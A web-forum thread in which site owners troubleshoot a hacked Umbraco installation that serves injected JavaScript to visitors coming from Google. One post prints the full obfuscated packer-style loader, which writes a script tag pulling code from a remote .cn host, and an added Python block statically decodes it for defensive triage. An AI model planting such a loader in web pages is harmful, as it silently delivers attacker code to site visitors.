  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 01:58
    Katie
    0

    Umbraco site Hacked

    Hi, I have two Umbraco websites which appear to have been hacked. JavaScript is injected when visiting only certain URLs from Google. When viewing the page source by not coming through Google there is no JavaScript injected. I have checked all template files, and there is nothing in there. I have even wiped all code from the pages concerned, so only a blank page is available to be rendered, but the script is still injected when the web request comes from Google. We have completed virus and malware scans, but all are clear. Does anyone know what else we could check to find the injected script please? Thank you in advance.

  • Linx 98 posts 258 karma points
    Oct 18, 2023 @ 09:53
    Linx
    0

    From what you are saying, it sounds like you are suggesting there could be a bug with the Umbraco you are using.

    What version of Umbraco 9 are you using? When you say hacked, do you mean the entire site has been compromised (as in access to the database) or just a page is rendering with content you have no control over? Have you also tried a different browser? Is there any way this can be replicated against a local site?

    Thanks

  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 10:07
    Katie
    0

    We are using version 10.2.1. It is only when certain pages are visited from a link on Google. I can’t recreate the redirect from the website navigation directly.
    No I can’t replicate it locally.

    Thank you

  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 10:10
    Katie
    0

    We have found this script being sent back: eval(function(p,a,c,k,e,r){e=function(c){return(c

    redirecting people to https://br.zmdesf.cn/br.js

  • Linx 98 posts 258 karma points
    Oct 18, 2023 @ 10:34
    Linx
    0

    Any chance you could update your site to the latest version of Umbraco 10 (10.7 being the latest) to see if the issue remains?

  • Katie 25 posts 90 karma points
    Oct 18, 2023 @ 11:07
    Katie
    0

    Not easily, it is a live website. But do you think this would fix it?

    Thank you

  • Linx 98 posts 258 karma points
    Oct 18, 2023 @ 11:51
    Linx
    0

    I can't say yes for definite but that would be the first action to take.

    The Umbraco guys do visit this forum, so if it is a security concern they would act on it fast; however, they too may ask you to update to the latest version in case it's a known vulnerability that has already been addressed.

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 07:39
    Katie
    0

    I have upgraded to version 10.7, but unfortunately this hasn't helped.

  • Aaron 58 posts 406 karma points MVP 2x c-trib
    Oct 18, 2023 @ 12:11
    Aaron
    0

    Is your site behind a CDN?

    Could it be possible that a redirect has been intercepted and then cached in the CDN and is not actually hitting the site at all?

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 07:40
    Katie
    0

    No, unfortunately we don't use a CDN.

  • Nik 1614 posts 7260 karma points MVP 7x c-trib
    Oct 19, 2023 @ 08:57
    Nik
    0

    It could be worth putting a CSP in place in case the issue is that one of your third-party scripts has been compromised and is injecting the untrusted JavaScript.

    There are limited ways that erroneous JavaScript can get into your site.

    1. Umbraco back office user was compromised and that user's permissions have the ability to edit views/partial views or add scripts to pages via the content section - all back office user accounts should reset their passwords.
    2. Hosting environment has been compromised and accessed directly and the views updated from there - speak to your hosting provider and see if they can identify direct access.
    3. Existing 3rd party JavaScript has been compromised - having a CSP would help protect against this (not 100% but pretty good).
    4. CDN/Domain traffic interception is occurring - much harder to detect.

    Also, have you confirmed that your site is running on HTTPS with a valid certificate and has things like HSTS enabled, which should decrease the ability for someone to browse the site over HTTP and have the traffic intercepted?

    Thanks

    Nik

  • Sotiris Filippidis 286 posts 1501 karma points
    Oct 19, 2023 @ 16:28
    Sotiris Filippidis
    1

    Adding to the previous answer:

    Since you know what the offending code is, it would be worth trying to search for it in the production website files. This would give you a hint as to whether it's a hosting environment / Umbraco backoffice compromise or some other cause.

    If you do find the code inside one or more of your views, for example, there is a high chance someone has the ability to access the actual files, either from the Umbraco backoffice or from the hosting environment. So changing backoffice users' passwords and ensuring that the hosting environment doesn't allow any other technologies to be used (like classic ASP, PHP and so forth) can provide you with some kind of increased security there.

    If it's not in the files, it might be worth minimizing the attack surface by swapping CDN calls to JS files with local calls (get the files on your hosting environment's filesystem and use them from there).

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 07:44
    Katie
    0

    I have searched everywhere, and can't find the code.

    Yes I have swapped the CDN calls to all local files in case this was where the issue was coming from, but unfortunately this hasn't resolved it either.

    It seems so well hidden. The only additional piece of information I seem to have spotted is that when it is in the process of injecting the script, it briefly shows an error saying resource not found.

    Thank you so much for all your suggestions.

  • Chriztian Steinmeier 2800 posts 8790 karma points MVP 8x admin c-trib
    Oct 21, 2023 @ 16:45
    Chriztian Steinmeier
    0

    Hi Katie,

    Are you absolutely sure the URLs from Google are on your site, and not a spoofed site with very similar-looking URLs?

    Seems a bit strange that only when visiting from Google (of all places) the scripts are injected...

    /Chriztian

  • Katie 25 posts 90 karma points
    Oct 21, 2023 @ 18:39
    Katie
    0

    Yes, it is so odd. This is why I just can't work it out. This is the code they seem to be injecting:

    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))',44,44,'|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|br.zmdesf|cn|br|js|split'.split('|'),0,{}))
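    As an added defender-side example (not code from this thread, from Umbraco, or from the packer's author), the Python below statically decodes the script quoted above, which is wrapped twice in the well-known p.a.c.k.e.r stub, and lists the remote resource it would load, without ever evaluating it; the only input is the sample copied from the post.

    ```python
    import re

    # The packed script quoted in the post above (copied from the page, not constructed), kept on one line.
    SAMPLE = r'''eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))',44,44,'|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|br.zmdesf|cn|br|js|split'.split('|'),0,{}))'''

    # Packer digit alphabet: 0-9a-z for digit values <= 35, then chr(value + 29) for A-Z and beyond.
    ALNUM = "0123456789abcdefghijklmnopqrstuvwxyz"
    # Matches the trailing call  }('payload', base, count, 'w0|w1|...'.split('|'), ...)
    PACKED_RE = re.compile(
        r"\}\s*\('(?P<p>(?:[^'\\]|\\.)*)',\s*(?P<a>\d+),\s*(?P<c>\d+),"
        r"\s*'(?P<k>(?:[^'\\]|\\.)*)'\.split\('\|'\)"
    )

    def symbol(n: int, base: int) -> str:
        """Re-implements the stub's e(c): n written in `base` using the packer's digit alphabet."""
        d = n % base
        digit = ALNUM[d] if d <= 35 else chr(d + 29)
        return ("" if n < base else symbol(n // base, base)) + digit

    def js_unescape(s: str) -> str:
        """Undo the backslash escapes of a single-quoted JS string literal."""
        return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m[1], m[1]), s)

    def unpack_once(src: str):
        """Statically apply one packer layer; returns None when `src` is not packed."""
        m = PACKED_RE.search(src)
        if not m:
            return None
        payload, base, count = js_unescape(m["p"]), int(m["a"]), int(m["c"])
        words = js_unescape(m["k"]).split("|")
        for i in range(count - 1, -1, -1):      # same order as the stub's while(c--) loop
            if i < len(words) and words[i]:
                pat = r"\b" + re.escape(symbol(i, base)) + r"\b"
                payload = re.sub(pat, lambda _m, w=words[i]: w, payload)
        return payload

    def unpack_all(src: str) -> str:
        """Peel nested layers (the sample is packed twice) without eval'ing anything."""
        while (nxt := unpack_once(src)) is not None:
            src = nxt
        return src

    def find_urls(text: str) -> list:
        """Remote resources the decoded script would load: the indicators to block and grep logs for."""
        return re.findall(r"https?://[^\s'\"<>]+", text)

    if __name__ == "__main__":
        decoded = unpack_all(SAMPLE)
        print(decoded, "\nloads:", find_urls(decoded))
    ```

    The decoded text is a single document.write of a script tag, so the URL it returns is what to search the server file system, database content and access logs for, and what to block at the proxy while the injection point is traced.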
    
  • Jeffrey Schoemaker 408 posts 2138 karma points MVP 8x c-trib
    Oct 21, 2023 @ 18:14
    Jeffrey Schoemaker
    0

    Hi Katie,

    If you send me an email I will see how I can help you out!

    Kind regards,

    Jeffrey

  • Richard Hamilton 11 posts 82 karma points
    Feb 08, 2024 @ 15:24
    Richard Hamilton
    0

    I have also been getting this on an Umbraco 7 site and earlier Umbraco 8 sites. Has anyone worked out how to get rid of it?

    The Umbraco 8 site I have upgraded to 8.18, which seems to have solved it for now.

  • Steve Morgan 1349 posts 4458 karma points c-trib
    Feb 11, 2024 @ 16:53
    Steve Morgan
    0

    Do you have any third party JS libraries? Google Tag Manager or anything like that? If your GTM container has been hacked they could have injected it there.

    If you view the source of the page, is it already there or does it appear later?

    I would guess something is injecting it in via JS. Try stripping all JS references and add them back one by one.
